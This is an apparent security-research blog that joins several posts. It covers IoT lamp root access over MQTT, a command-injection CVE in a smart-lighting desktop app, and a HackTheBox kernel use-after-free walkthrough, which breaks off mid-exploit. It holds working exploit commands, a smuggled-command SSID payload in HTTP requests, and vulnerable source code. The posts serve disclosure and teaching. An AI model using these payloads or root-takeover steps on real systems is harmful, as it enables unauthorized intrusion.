We can overwrite the root password using passwd -d which resets the password to be empty, and the OpenSSH will gladly accept that. This means that we can essentially start an OpenSSH server using touch /acme_config/ssh_enabled && passwd -d && reboot. However, in practice our commands get executed using execv(char* filepath, char** argv). This means that we need to execute the commands seperately with the full path. Hence, our payload is as follows:

$ mosquitto_pub -L mqtts://127.0.0.1:443/acme/device/serialno/exec/server -m "debug /bin/touch /acme/ssh_enabled" --insecure --cafile /etc/mosquitto/certs/ca.crt
$ mosquitto_pub -L mqtts://127.0.0.1:443/acme/device/serialno/exec/server -m "stop" --insecure --cafile /etc/mosquitto/certs/ca.crt
$ mosquitto_pub -L mqtts://127.0.0.1:443/acme/device/serialno/exec/server -m "debug /bin/passwd -d root" --insecure --cafile /etc/mosquitto/certs/ca.crt
$ mosquitto_pub -L mqtts://127.0.0.1:443/acme/device/serialno/exec/server -m "stop" --insecure --cafile /etc/mosquitto/certs/ca.crt
$ mosquitto_pub -L mqtts://127.0.0.1:443/acme/device/serialno/exec/server -m "debug /sbin/reboot" --insecure --cafile /etc/mosquitto/certs/ca.crt

When we execute this, we start the OpenSSH server and we can log in as root:

$ ssh root@192.168.128.20

root@192.168.128.20:~$ whoami
root

Conclusion

As we have discovered in this article, a critical vulnerability was found in many, many IoT smart lighting devices, allowing attackers to gain control over the entire device and access sensitive information. This serves as a reminder of the importance of IoT security for both vendors and consumers.

As consumers, we can follow these best practices to enhance the security of our home network:

Keep devices' software up-to-date to prevent vulnerabilities from being exploited.
Keep smart devices on a separate sub-network to reduce privacy concerns.
Use long passwords (even pass-sentences) and two-factor authentication where possible.
Disable unused or unnecessary services and ports on devices.

As developers, we can implement the following best practices to ensure the security of our IoT devices:

Conduct thorough security assessments and penetration testing to identify and fix vulnerabilities before deploying devices.
Implement encryption and authentication mechanisms to secure data transmitted between the device and the server.
Use secure coding practices and avoid insecure software libraries.
Regularly update and patch devices to fix security vulnerabilities (and do it fast :-) ).

By following these best practices, we can reduce the risk of security breaches and ensure the safety and security of our connected devices and home networks.

Furthermore, the vulnerabilities in said smart lamps were patched by the vendor in early January 2023, about a month after coordinated vulnerability disclosure. The vendor gave us explicit permission to publish this blogpost - under the agreement we wouldn't mention the vendors name nor product name - and gave us permission to publish CVE-2022-47758.

We hope this blogpost has been as interesting to read for you as it was for us to write, and thank you for taking the time to read this blogpost.

Notselwyn, March 2023

How I hacked IoT management apps: the story behind CVE-2022-46640

notselwyn — Wed, 08 Mar 2023 07:30:00 GMT

Have you ever wondered how secure desktop applications really are? Recently, we put one of them to the test and found some critical vulnerabilities such as unauthenticated Remote Code Execution (CVE-2022-46640), Local File Inclusion and Remote Wireless Reconfiguration which allowed us to remotely compromise the Windows desktop. In this blogpost, we're going to share our experience hacking into a desktop app with a very large number of downloads, and explain how we were able to do it. Whether you're a developer, a security researcher, or just someone curious about software security, you won't want to miss this interesting write-up. So, let's dive in!

Content

Introduction to IoT desktop apps
Proof of Concept exploit
Analyzing the IoT desktop app
Creating a Proof of Concept exploit
Conclusion

Introduction to IoT desktop apps

Smart lighting has evolved beyond just mobile apps. With the rise of desktop apps, managing smart lights has become even more convenient. Desktop apps for smart lighting allow users to manage their smart lights from their computers, with some apps offering unique features like a more user-friendly interface or advanced automation options.

Desktop apps for smart lighting can pose security risks, including potential vulnerabilities that hackers could exploit to gain access to a user's smart lights and even the desktop itself... To minimize these risks, users should download apps from trusted sources, and especially update apps and operating systems regularly. Additionally users can separate IoT networks from normal networks.

The desktop app we managed to exploit was written in Electron with an back-end server written in Express.js. The back-end Express.js server was accessible from any device which meant that remote exploitation was possible.

Proof of Concept exploit

In order to exploit the command injection vulnerability (which leads to unauthenticated RCE) we can send a mere HTTP request as Proof of Concept (PoC). The root cause is a command injection vulnerability in an unauthenticated Express.js API endpoint on the device that changes the active WiFi network. This "intended" WiFi reconfiguration functionality itself is an RWR vulnerability because an attacker can set up their own malicious WiFi network and make the target device connect to it to eavesdrop it.

The code that causes this command injection vulnerability is located in the Windows WiFi network subsystem of the application. We can supply a malicious access point SSID in the HTTP request which allows us to inject our own commands into execCommand().

function connect(ap) { 
    console.log("using windows wifi handler");
    return scan().then((networks) => { ...
    }).then(() => {
        return execCommand('netsh wlan add profile filename="nodeWifiConnect.xml"');
    }).then(() => {
        return execCommand(`netsh wlan connect ssid="${ap.name}" name="${ap.name}"`);
    }).then(() => { ...
    }).catch((err) => {
        console.warn("windowsWifi connectToWifi Error:", err);
        return execCommand(`netsh wlan delete profile "${ap.name}"`).then(() => {
            return Promise.reject(err);
        });
    });
}

connect(ap) - the code that contains the command injection vulnerability

The payload in the malicious HTTP request is a JSON body including the new WiFi SSID and the new WiFi password. We can supply an SSID that escapes the command netsh wlan delete profile "${ap.name}" to exploit it. An example of such SSID is {"name": "\"&calc.exe&::"} - in which & is used to background the command and :: to comment out everything that follows.

POST /validateWifiPassword HTTP/1.1
Host: target.local:56751
Content-Length: 75
Content-Type: application/json

{"new_network":{"name":"attacker_ssid","password":"attacker_pass"}}

HTTP request for the typical credential check

POST /validateWifiPassword HTTP/1.1
Host: target.local:56751
Content-Length: 75
Content-Type: application/json

{"new_network":{"name":"\"&calc.exe&::","password":"attacker_pass"}}

HTTP request containing our own payload which executes calc.exe

This proof of concept payload spawns the Windows calculator on the desktop of the vulnerable target device. According to our research it is possible to make a fully fletched shell that can upload files, download files, and execute commands all while using native vulnerabilities we found in the app. Those vulnerabilities like LFI, LFW, et cetera have been patched by the vendor due to our research as well.

Analyzing the IoT desktop app

In order to find vulnerabilities in the desktop app, we need to get our hands on the code. To find the relevant code, I tried searching in the app directory for strings that get shown when running the app. If the app was a compiled PE executable we should still get results. Using grep -iRe "Sign In" we can find the file app.asar. An ASAR file turns out to be a source code package for an Electron app. We found the asar tool developed by Electron themselves and used it to extract the source code from the ASAR file using asar e app.asar out.

The first thing we researched when we got access to the source code was finding the entrypoint of the application. Since the project structure looked an aweful lot like an Express.js webserver, we started looking for the initialization of the webserver to find the host, port and routes. It turns out that the ports are provided in an environment and that the app listens to port 56751 and binds to 0.0.0.0 (due to its lack of providing an interface).

The fact that the server binds to 0.0.0.0 is the root cause of all vulnerabilities listed in this blogpost. Because the interface doesn't bind to just localhost (a.k.a. 127.0.0.1), any device on the network can connect to the webserver. This is fundamentally not necessary in this usecase and it's making exploitation possible from other devices. If the server binded to 127.0.0.1 instead, there wouldn't be RCE since remote devices would be able to communicate with the webserver.

  production: {
    env: 'production',
    root: rootPath,
    app: {
      name: 'device-monitor-server'
    },
    port: 56751,
    redis: {
        host: process.env.REDIS_ADDRESS,
        port: 6379
    }
  }

config/config.js - containing information about the environment


global.App = {
    app: app,
    env: env,
    server: http.createServer(app),
    config: require('./config/config'),
    port: require('./config/config').port,
    // ...
    start: function() {
        if (!this.started) {
            // ...
            this.server.listen(this.port)
            console.log("Operating System :", process.platform);
            console.log("Running App Version " + App.version + " on port " + App.port + " in " + App.env + " mode")
        }
    }
}

application.js - binding to 0.0.0.0:56751

Since we found out that the webserver binds to 0.0.0.0:56751, we can now start looking for API routes, since the Electron app uses those to manage the smart lights. After running a few grep queries for "routes", we found config/routes.js. This file contains more than 60 API routes from actions like managing the smart devices to changing WiFi settings on the host.

// ...

app.get('/network/info', EncryptionController.getCurrentNetworkInfo);
app.post('/network/reconnect', EncryptionController.reconnectToNetwork);
app.get('/wides', EncryptionController.getWifis);

app.post('/validateWifiPassword', EncryptionController.validateWifiPassword);

app.post('/wac/device', dnssdController.enableWACMode, EncryptionController.connectDeviceToNetwork, dnssdController.disableWACMode, dnssdController.getDevices);

// ...

config/routes.js - containing the routes of the app

We analysed nearly all 60 endpoints and found plenty of vulnerabilities - all of which can be exploited remotely because the server binds to 0.0.0.0. We started analysing the endpoints with a priority on dangerous endpoints - the endpoints which call command execution functions. We searched for those using grep -iRe "execCommand", which only gave app/utils/windowsWifi.js back. Analysing this file gave the following dangerous functions:

function execCommand(cmd) {
    return new Promise((resolve, reject) => {
        exec(cmd, env, (err, stdout, stderr) => { /* ... */ });
    });
}

execCommand - the primary dangerous function being used

function connect(ap) { 
    console.log("using windows wifi handler");
    return scan().then((networks) => { // ... 
    }).then(() => { // ...
    }).then(() => {
        return execCommand(`netsh wlan connect ssid="${ap.name}" name="${ap.name}"`);
    }).then(() => { // ...
    }).catch((err) => {
        console.warn("windowsWifi connectToWifi Error:", err);
        return execCommand(`netsh wlan delete profile "${ap.name}"`).then(() => { // ...
        });
    });
}

connect(ap) - dangerous function containing

The function connect(ap) sticks out because it executes a command with user input injected into the command. If we could set ap.name to "& calc&, we should be able to start calc.exe on the management desktop. In order to check whether or not we could control ap.name from a webrequest, we ran another grep query for connect and got results.

We found validateWifiPassword(req, res) which is a callback for app.post('/validateWifiPassword', ...). This function calls platformWifi.connect, in which platformWifi is a class dependent on the OS of the host. If it is Windows, it calls the vulnerable connect(ap) function above - otherwise it will use a secure version. This means that only Windows is vulnerable.

let platformWifi;

if (process.platform === 'win32') {
    // node-wifi does not work well for some operations on Windows, so import our own library for them
    platformWifi = require('../utils/windowsWifi');
} else {
    platformWifi = wifi;
}

platformWifi - the selected WiFi library

function validateWifiPassword(req, res) {
    const new_network = req.body.new_network;
    if (!new_network.name || !new_network.password) {
        // ...
    }
    console.log(`Checking wifi creds for ${new_network.name}...`);

    const callback = (err) => {
        // ...
    };

    let accessPoint = { name: new_network.name, password: new_network.password };
    platformWifi.connect(accessPoint, callback);
}

validateWifiPassword() - the API callback function

The validateWifiPassword() function requests the parameter new_network with subparameters name and password. These are passed directly into platformWifi.connect(accessPoint, callback), which means that there's a command injection vulnerability since we can supply an arbitrary SSID into the command netsh wlan connect ssid="${ap.name}".

Creating a Proof of Concept exploit

We have vision on our exploitable primitives: command injection through an HTTP request sent to the API endpoint POST /validateWifiPassword hosted on a webserver that binds to 0.0.0.0:56751. Let's go through it from start to finish.

We're starting the exploit by sending a request to the following Express.js API endpoint that binds to 0.0.0.0:56751. The API endpoint triggers a call to EncryptionController.validateWifiPassword().

app.post('/validateWifiPassword', EncryptionController.validateWifiPassword);

The API endpoint registration including its callback function

The validateWifiPassword() function is a wrapper for sanitizing the user input and handling request output. The user input is expected in the HTTP body and is expected to have the form of new_network.name (for the WiFi SSID) and new_network.password (for the WiFi password). The easiest way to do this is using a JSON structure like {"new_network":{"name":"ABC","password":"XYZ"}}.

function validateWifiPassword(req, res) {
    const new_network = req.body.new_network;
    if (!new_network.name || !new_network.password) {
        console.error("Invalid request object.");
        return res.sendStatus(422);
    }
    console.log(`Checking wifi creds for ${new_network.name}...`);

    const callback = (err) => {
        if (err) {
            // ...
        }
        console.log("Successfully connected  to", new_network.name);
        return res.sendStatus(204);
    };

    let accessPoint = { name: new_network.name, password: new_network.password };
    platformWifi.connect(accessPoint, callback);
}

validateWifiPassword() - the IO wrapper around wifi.connect()

Next, the function windowsWifi.connect() gets called. This function calls the dangerous execCommand function plenty of times using user controllable input. Specifically, new_network.name gets used for the command injection. This means that we have to inject a payload as new_network.name to achieve RCE on the webserver.

function connect(ap) { 
    console.log("using windows wifi handler");
    return scan().then((networks) => { ...
    }).then(() => {
        return execCommand('netsh wlan add profile filename="nodeWifiConnect.xml"');
    }).then(() => {
        return execCommand(`netsh wlan connect ssid="${ap.name}" name="${ap.name}"`);
    }).then(() => { ...
    }).catch((err) => {
        console.warn("windowsWifi connectToWifi Error:", err);
        return execCommand(`netsh wlan delete profile "${ap.name}"`).then(() => {
            return Promise.reject(err);
        });
    });
}

connect() - the function containing vulnerable code

We're dealing with the command netsh wlan connect ssid="${ap.name}" name="${ap.name}" and we can control ${ap.name}. We want to execute the Windows calculator (calc.exe) to get a graphical proof of concept on the vulnerable device. To do this, we need to escape the quotes of the command and ignore the rest of the command. This would look something like netsh wlan connect ssid=""&calc.exe&::" name=""&calc.exe&::"where only netsh wlan connect ssid=""& calc.exe& gets executed since :: makes the rest of the line a comment. We use & to background the task, so netsh wlan connect ssid="" can fail in the background whilst calc.exe can succeed in the background. This means that we need to make our SSID "&calc.exe&::. The entire HTTP request would become as follows.

POST /validateWifiPassword HTTP/1.1
Host: target.local:56751
content-type: application/json
Content-Length: 61

{"new_network":{"name":"\"&calc.exe&::","password":"xyz"}}

The PoC payload executing calc.exe on the target device

Conclusion

In conclusion, we exploited a command injection vulnerability by sending an HTTP request to a remote vulnerable Express.js API webserver that binds to all interfaces. Our internal research concluded that it's possible to make a fully fletched shell using vulnerabilities in this app, that could upload/download files and execute commands which would make it ideal for attackers.

The mitigations for these vulnerabilities would be as follows: only bind to interfaces that need access (in this case 127.0.0.1) to prevent remote access all together; sanitize controllable user input (especially when executing commands); disable remote wireless reconfiguration all together to prevent MitM attacks; disable arbitrary file operations (c.q. reading and writing) as it will only introduce vulnerabilities.

Going forward, we recommend users to keep their software up-to-date as vendors continuously release patches for vulnerabilities like those shown in this blogpost. Additionally we recommend more advanced users to use firewalls on their devices, which should deny incoming traffic by default as it can prevent lots of vulnerabilities.

Furthermore, the vulnerabilities in said desktop app were patched by the vendor in December 2022, a month after coordinated vulnerability disclosure (CVD). The vendor gave us explicit permission to publish this blogpost (under the agreement we wouldn't mention the vendors name nor desktop app name) and to publish CVE-2022-46640.

We hope you learned reading this blogpost as much as we did researching the vulnerabilities, and thank you for taking the time to read this blogpost.

Notselwyn, March 2023

Knote (HackTheBox)

notselwyn — Sun, 15 Jan 2023 23:21:55 GMT

Heya infosec folks, in this write-up we will cover the Knote (kernel-note) kernel-pwn challenge on HackTheBox. We can trigger a local privilege escalation attack by exploiting a use-after-free bug. The description of the challenge is as follows:

Secure your secrets in the kernel space!

Summary

What are kernel modules?
How does this kernel CTF work?
Analyzing the kmodule
Finding primitives
Creating an exploit
Creating a real world version

What are kernel modules?

Linux kernel modules are a way to extend the Linux kernel in a hotswappable way. Kernel modules are also used for creating drivers, which is why it's useful to learn how to exploit them. Thankfully, you can use the same pwn / exploitation techniques in kernel modules as in the core Linux kernel.

Kernel modules (kmodules) can do a lot of things that the core kernel can do as well: manage a virtual filesystem such as /proc, manage task structs, et cetera. They can register a device file as well, which you can use to communicate with the kmodule using read(), write(), ioctl(), et cetera.

You can insert, list, and remove kernel modules by respectively using the binaries insmod, lsmod, and rmmod.

How do kernel pwn CTFs work?

The goal of most kernel pwn CTFs are local privilege escalation exploits, in which a user becomes root in order to read a root-only flag file. Typically, you will be given 3 files:

qemu.sh: a BASH script to run a QEMU command. QEMU (Quick EMUlator) is a FOSS instructionset simulator which you can use to run custom Linux kernels in custom filesystems. It may sound like a VM, but it is not.
initramfs.cpio.gz / rootfs.img: the custom (compressed) filesystem to run QEMU with.
bzImage : the custom Linux kernel to run QEMU with.

Make sure to remove -no-kvm from qemu.sh as it is for old versions of Qemu. Also note that there's no kaslr, no smap, no smep, etc.

#!/bin/bash

timeout --foreground 35 qemu-system-x86_64 -m 128M \
  -kernel ./bzImage \
  -append 'console=ttyS0 loglevel=3 oops=panic panic=1 nokaslr' \
  -monitor /dev/null \
  -initrd ./initramfs.cpio.gz \
  -cpu qemu64 \
  -smp cores=1 \
  -nographic

qemu.sh content

Now you might see that I use initramfs.cpio.gz instead of the initramfs.cpio.gz which is supplied in the challenge. This is because I first extracted it using cpio -iF rootfs.img. After that, I used the following scripts to compress and decompress the resulting directory:

#!/bin/bash

if [ "$1" = "" ]; then
    echo "usage: $0 ";
else

    # Decompress a .cpio.gz packed file system
    mkdir initramfs
    pushd . && pushd initramfs
    cp ../$1 .
    gzip -dc $1 | cpio -idm &>/dev/null && rm $1
    popd
fi

decompress.sh

#!/bin/bash

# Compress initramfs with the included statically linked exploit
in=$1
out=$(echo $in | awk '{ print substr( $0, 1, length($0)-2 ) }')
musl-gcc $in -static -pie -s -O0 -fPIE -o $out || exit 255
mv $out initramfs
pushd . && pushd initramfs
find . -print0 | cpio --null --format=newc -o 2>/dev/null | gzip -9 > ../initramfs.cpio.gz
popd

compress.sh

So firstly I create an initramfs.cpio.gz for QEMU using irfs_compress.sh initramfs/exploit.c && ./qemu-cmd.sh. Now, we can test QEMU by running ./qemu.sh:

sh: can't access tty; job control turned off
~ $ whoami
user
~ $

Qemu proof-of-concept (PoC)

Analyzing the kmodule

We are given the following C sourcecode of the knote.ko kernel module:

#include 
#include 
#include 
#include 
#include 
#include 
#include 

#define DEVICE_NAME "knote"
#define CLASS_NAME "knote"

MODULE_AUTHOR("r4j");
MODULE_DESCRIPTION("Secure your secrets in the kernelspace");
MODULE_LICENSE("GPL");

static DEFINE_MUTEX(knote_ioctl_lock);
static long knote_ioctl(struct file *file, unsigned int cmd, unsigned long arg);

static int major;
static struct class *knote_class  = NULL;
static struct device *knote_device = NULL;
static struct file_operations knote_fops = {
    .unlocked_ioctl = knote_ioctl
};

struct knote {
    char *data;
    size_t len;
    void (*encrypt_func)(char *, size_t);
    void (*decrypt_func)(char *, size_t);
};

struct knote_user {
    unsigned long idx;
    char * data;
    size_t len;
};

enum knote_ioctl_cmd {
    KNOTE_CREATE = 0x1337,
    KNOTE_DELETE = 0x1338,
    KNOTE_READ = 0x1339,
    KNOTE_ENCRYPT = 0x133a,
    KNOTE_DECRYPT = 0x133b
};

struct knote *knotes[10];

void knote_encrypt(char * data, size_t len) {
    int i;
    for(i = 0; i < len; ++i)
        data[i] ^= 0xaa;
}

void knote_decrypt(char *data, size_t len) {
    knote_encrypt(data, len);
}

static long knote_ioctl(struct file *file, unsigned int cmd, unsigned long arg) {
    mutex_lock(&knote_ioctl_lock);
    struct knote_user ku;
    if(copy_from_user(&ku, (void *)arg, sizeof(struct knote_user)))
        return -EFAULT;
    switch(cmd) {
        case KNOTE_CREATE:
            if(ku.len > 0x20 || ku.idx >= 10)
                return -EINVAL;
            char *data = kmalloc(ku.len, GFP_KERNEL);
            knotes[ku.idx] = kmalloc(sizeof(struct knote), GFP_KERNEL);
            if(data == NULL || knotes[ku.idx] == NULL) {
                mutex_unlock(&knote_ioctl_lock);
                return -ENOMEM;
            }

            knotes[ku.idx]->data = data;
            knotes[ku.idx]->len = ku.len;
            if(copy_from_user(knotes[ku.idx]->data, ku.data, ku.len)) {
                kfree(knotes[ku.idx]->data);
                kfree(knotes[ku.idx]);
                mutex_unlock(&knote_ioctl_lock);
                return -EFAULT;
            }
            knotes[ku.idx]->encrypt_func = knote_encrypt;
            knotes[ku.idx]->decrypt_func = knote_decrypt;
            break;
        case KNOTE_DELETE:
            if(ku.idx >= 10 || !knotes[ku.idx]) {
                mutex_unlock(&knote_ioctl_lock);
                return -EINVAL;
            }
            kfree(knotes[ku.idx]->data);
            kfree(knotes[ku.idx]);
            knotes[ku.idx] = NULL;
            break;
        case KNOTE_READ:
            if(ku.idx >= 10 || !knotes[ku.idx] || ku.len > knotes[ku.idx]->len) {
                mutex_unlock(&knote_ioctl_lock);
                return -EINVAL;
            }
            if(copy_to_user(ku.data, knotes[ku.idx]->data, ku.len)) {
                mutex_unlock(&knote_ioctl_lock);
                return -EFAULT;
            }
            break;
        case KNOTE_ENCRYPT:
            if(ku.idx >= 10 || !knotes[ku.idx]) {
                mutex_unlock(&knote_ioctl_lock);
                return -EINVAL;
            }
            knotes[ku.idx]->encrypt_func(knotes[ku.idx]->data, knotes[ku.idx]->len);
            break;
         case KNOTE_DECRYPT:
            if(ku.idx >= 10 || !knotes[ku.idx]) {
                mutex_unlock(&knote_ioctl_lock);
                return -EINVAL;
            }
            knotes[ku.idx]->decrypt_func(knotes[ku.idx]->data, knotes[ku.idx]->len);
            break;
        default:
            mutex_unlock(&knote_ioctl_lock);
            return -EINVAL;
    }
    mutex_unlock(&knote_ioctl_lock);
    return 0;
}

static int __init init_knote(void) {
    major = register_chrdev(0, DEVICE_NAME, &knote_fops);
    if(major < 0)
        return -1;

    knote_class = class_create(THIS_MODULE, CLASS_NAME);
    if (IS_ERR(knote_class)) {
        unregister_chrdev(major, DEVICE_NAME);
        return -1;
    }

    knote_device = device_create(knote_class, 0, MKDEV(major, 0), 0, DEVICE_NAME);
    if (IS_ERR(knote_device))
    {
        class_destroy(knote_class);
        unregister_chrdev(major, DEVICE_NAME);
        return -1;
    }

    return 0;
}

static void __exit exit_knote(void)
{
    device_destroy(knote_class, MKDEV(major, 0));
    class_unregister(knote_class);
    class_destroy(knote_class);
    unregister_chrdev(major, DEVICE_NAME);
}

module_init(init_knote);
module_exit(exit_knote);

Knote.c sourceode

The first thing that the kernel calls in a newly inserted module (c.q. knote.ko) is the function with keyword __init, which in this case belongs to the following init functions:

static int __init init_knote(void) {
    major = register_chrdev(0, DEVICE_NAME, &knote_fops);
    if(major < 0)
        return -1;

    knote_class = class_create(THIS_MODULE, CLASS_NAME);
    if (IS_ERR(knote_class)) {
        unregister_chrdev(major, DEVICE_NAME);
        return -1;
    }

    knote_device = device_create(knote_class, 0, MKDEV(major, 0), 0, DEVICE_NAME);
    if (IS_ERR(knote_device))
    {
        class_destroy(knote_class);
        unregister_chrdev(major, DEVICE_NAME);
        return -1;
    }

    return 0;
}

First function called in the kmodule

As we can see, it registers a character device (chrdev) with the name "knote" and it enables the device operation unlocked_iotctl, which means that it's possible to interact with the device using ioctl().

static struct file_operations knote_fops = {
    .unlocked_ioctl = knote_ioctl
};

Knote.ko file operations

This means that our only userland form of messing with the kmodule is using ioctl() to interact with the knote_ioctl function. As said, we need to use int ioctl(int fd, unsigned long request, ...) in the exploit to pass the file, cmd and arg arguments to long knote_ioctl(struct file *file, unsigned int cmd, unsigned long arg) . This function performs several commands: KNOTE_CREATE, KNOTE_DELETE, KNOTE_READ, KNOTE_ENCRYPT and KNOTE_DECRYPT.

static long knote_ioctl(struct file *file, unsigned int cmd, unsigned long arg) {
    mutex_lock(&knote_ioctl_lock);
    
    struct knote_user ku;
    if(copy_from_user(&ku, (void *)arg, sizeof(struct knote_user)))
        return -EFAULT;

    switch(cmd) {
        case KNOTE_CREATE:
            // unsigned values
            if(ku.len > 0x20 || ku.idx >= 10)
                return -EINVAL;

            // create knote
            char *data = kmalloc(ku.len, GFP_KERNEL);
            knotes[ku.idx] = kmalloc(sizeof(struct knote), GFP_KERNEL);
            if(data == NULL || knotes[ku.idx] == NULL) 
            {
                mutex_unlock(&knote_ioctl_lock);
                return -ENOMEM;
            }

            // copy userdata to note data
            knotes[ku.idx]->data = data;
            knotes[ku.idx]->len = ku.len;
            if(copy_from_user(knotes[ku.idx]->data, ku.data, ku.len)) {
                kfree(knotes[ku.idx]->data);
                kfree(knotes[ku.idx]);
                mutex_unlock(&knote_ioctl_lock);
                return -EFAULT;
            }
            knotes[ku.idx]->encrypt_func = knote_encrypt;
            knotes[ku.idx]->decrypt_func = knote_decrypt;
            break;
        case KNOTE_DELETE:
            if(ku.idx >= 10 || !knotes[ku.idx]) 
            {
                mutex_unlock(&knote_ioctl_lock);
                return -EINVAL;
            }
            
            kfree(knotes[ku.idx]->data);
            kfree(knotes[ku.idx]);
            knotes[ku.idx] = NULL;
            break;
        case KNOTE_READ:
            if (ku.idx >= 10 || !knotes[ku.idx] || ku.len > knotes[ku.idx]->len)
            {
                mutex_unlock(&knote_ioctl_lock);
                return -EINVAL;
            }
            
            if (copy_to_user(ku.data, knotes[ku.idx]->data, ku.len)) 
            {
                mutex_unlock(&knote_ioctl_lock);
                return -EFAULT;
            }
            break;
        case KNOTE_ENCRYPT:
            if(ku.idx >= 10 || !knotes[ku.idx]) 
            {
                mutex_unlock(&knote_ioctl_lock);
                return -EINVAL;
            }

            knotes[ku.idx]->encrypt_func(knotes[ku.idx]->data, knotes[ku.idx]->len);
            break;
         case KNOTE_DECRYPT:
            if(ku.idx >= 10 || !knotes[ku.idx]) {
                mutex_unlock(&knote_ioctl_lock);
                return -EINVAL;
            }

            knotes[ku.idx]->decrypt_func(knotes[ku.idx]->data, knotes[ku.idx]->len);
            break;
        default:
            mutex_unlock(&knote_ioctl_lock);
            return -EINVAL;
    }
    mutex_unlock(&knote_ioctl_lock);
    return 0;
}

knote_ioctl() - used for interacting throug ioctl()

As we can read, the arg parameter is used to supply values to a knote_user object, using copy_from_user(&ku, arg, sizeof(struct knote_user)): copies sizeof(struct knote_user) bytes from userland pointer arg to kernel pointer ko. Secondly, it executes one of the KNOTE_ cases.

Finding primitives

The first step of exploit development is identifying protections: earlier we found out that there's no active kernel protections (no kaslr, no smap, no smep, et cetera). Next, there's finding exploit primitives: let's start off with finding execution flow hijacking. Firstly I checked for any forms of buffer overflow bugs on the stack and on the heap, but I couldn't find anything. However, once I took a look at KNOTE_CREATE, I saw that a use-after-free bug can be triggered.

Finding a memory corruption bug

The KNOTE_CREATE command allocates a knote and it's data using kmalloc, which stands for kernel malloc. Then, it tries to copy the userland data to the kernel note data. However if that copy fails, it will kfree (kernel free) both the kernel note and the kernel notes' data.

static long knote_ioctl(struct file *file, unsigned int cmd, unsigned long arg) {
    mutex_lock(&knote_ioctl_lock);
    
    struct knote_user ku;
    if(copy_from_user(&ku, (void *)arg, sizeof(struct knote_user)))
        return -EFAULT;

    switch(cmd) {
        case KNOTE_CREATE:
            // unsigned values
            if(ku.len > 0x20 || ku.idx >= 10)
                return -EINVAL;

            // create knote
            char *data = kmalloc(ku.len, GFP_KERNEL);
            knotes[ku.idx] = kmalloc(sizeof(struct knote), GFP_KERNEL);
            // ...
            
            // copy userdata to note data
            knotes[ku.idx]->data = data;
            knotes[ku.idx]->len = ku.len;
            if(copy_from_user(knotes[ku.idx]->data, ku.data, ku.len)) {
                kfree(knotes[ku.idx]->data);
                kfree(knotes[ku.idx]);
                mutex_unlock(&knote_ioctl_lock);
                return -EFAULT;
            }
            knotes[ku.idx]->encrypt_func = knote_encrypt;
            knotes[ku.idx]->decrypt_func = knote_decrypt;
            break;
        // ...
        default:
            mutex_unlock(&knote_ioctl_lock);
            return -EINVAL;
    }
    mutex_unlock(&knote_ioctl_lock);
    return 0;
}

Before we dive into the details, please realize that the kernel heap cache works like a stack containing heap chunk pointers: you push them with kfree and pop them with kmalloc

It took me a bit of puzzling but I figured out that we can leverage this to trigger a use-after-free (UAF) bug. If we create a knote that fails copy_from_user by providing an invalid pointer, the kmodule will kfree(data) and after that it will kfree(knote) but it wont reset knotes[ku.idx] = NULL. Additionally, the allocation is in the wrong order of kmalloc(data) and then kmalloc(knote). Because of this, a weird UAF scenario arises in the kernel memory cache where we can overwrite knotes[ku.idx] with userland ku.data. For clarification of this mindboggling bug I have made the following diagram:

Description of th UAF bug

Finding a way to hijack execution flow

Now we have a UAF bug, we need to find ways to get code execution by utilizing it. After analyzing more commands, I noted that the KNOTE_ENCRYPT command calls knote->encrypt_func, stored in the knote structure.

struct knote {
    char *data;
    size_t len;
    void (*encrypt_func)(char *, size_t);
    void (*decrypt_func)(char *, size_t);
};

The knote structure

static long knote_ioctl(struct file *file, unsigned int cmd, unsigned long arg) {
    mutex_lock(&knote_ioctl_lock);
    
    struct knote_user ku;
    if(copy_from_user(&ku, (void *)arg, sizeof(struct knote_user)))
        return -EFAULT;

    switch(cmd) {
        // ...
        case KNOTE_ENCRYPT:
            if(ku.idx >= 10 || !knotes[ku.idx]) 
            {
                mutex_unlock(&knote_ioctl_lock);
                return -EINVAL;
            }

            knotes[ku.idx]->encrypt_func(knotes[ku.idx]->data, knotes[ku.idx]->len);
            break;
         // ...
        default:
            mutex_unlock(&knote_ioctl_lock);
            return -EINVAL;
    }
    mutex_unlock(&knote_ioctl_lock);
    return 0;
}

The KNOTE_ENCRYPT command

This means that we can execute arbitrary code by committing a UAF bug, overwrite knote->encrypt_func and calling it.

Creating an exploit

So now we have our primitives to get local code execution through a UAF bug in the kernel module, we can start building the exploit. Firstly, I defined a bunch of kernel module specific code, such as the structures and ioctl() calls to interact with the kmodule. These structures are copy/pasted from the knote.c file.

int FD_KNOTE;

enum knote_ioctl_cmd {
    KNOTE_CREATE = 0x1337,
    KNOTE_DELETE = 0x1338,
    KNOTE_READ = 0x1339,
    KNOTE_ENCRYPT = 0x133a,
    KNOTE_DECRYPT = 0x133b
};


typedef struct {
    unsigned long idx;
    char * data;
    size_t len;
} knote_user_t;


typedef struct {
    char *data;
    size_t len;
    void (*encrypt_func)(char *, size_t);
    void (*decrypt_func)(char *, size_t);
} knote_t;


void cmd_send(unsigned long cmd, unsigned long idx, char* data, size_t len)
{
    knote_user_t user;
    user.idx = idx;
    user.data = data;
    user.len = len;

    int retv = ioctl(FD_KNOTE, cmd, &user);
    printf("ioctl(fd=%d, cmd=0x%x, &ku=%p) -> %d\n", FD_KNOTE, cmd, &user, retv);
}

The contextual part of the exploit

After I got all necessary kernel module code, I created the UAF code. Please ignore the set_ctx_reg() and &privesc_ctx_swp variables. As you can see, we're firstly triggering the swap by allocating a knote with an invalid data pointer so that kn->data becomes kn. Then, we're allocating our custom kn by passing it as kn->data. Please note that I'm using knote index 1, and not 0 to prevent encrypt_func from being overwritten in the following code of knote.c:

switch(cmd) {
    case KNOTE_CREATE:
		// copy userdata to note data
        knotes[ku.idx]->data = data;
        knotes[ku.idx]->len = ku.len;
        if(copy_from_user(knotes[ku.idx]->data, ku.data, ku.len)) {
            kfree(knotes[ku.idx]->data);
            kfree(knotes[ku.idx]);
            mutex_unlock(&knote_ioctl_lock);
            return -EFAULT;
        }
        knotes[ku.idx]->encrypt_func = knote_encrypt;
        knotes[ku.idx]->decrypt_func = knote_decrypt;
}

The code overwriting encrypt_func

#include 
#include 
#include 
#include 
#include 
#include 
#include "kpwn.c"


int FD_KNOTE;

enum knote_ioctl_cmd {
    // ...
};


typedef struct {
    // ...
} knote_user_t;


typedef struct {
    // ...
} knote_t;


void cmd_send(unsigned long cmd, unsigned long idx, char* data, size_t len)
{
	// ...
}

void main()
{
    FD_KNOTE = open("/dev/knote", O_RDONLY);
    if (FD_KNOTE < 0)
    {
        puts("main(): open failed");
        exit(1);
    }

    /* case KNOTE_CREATE:
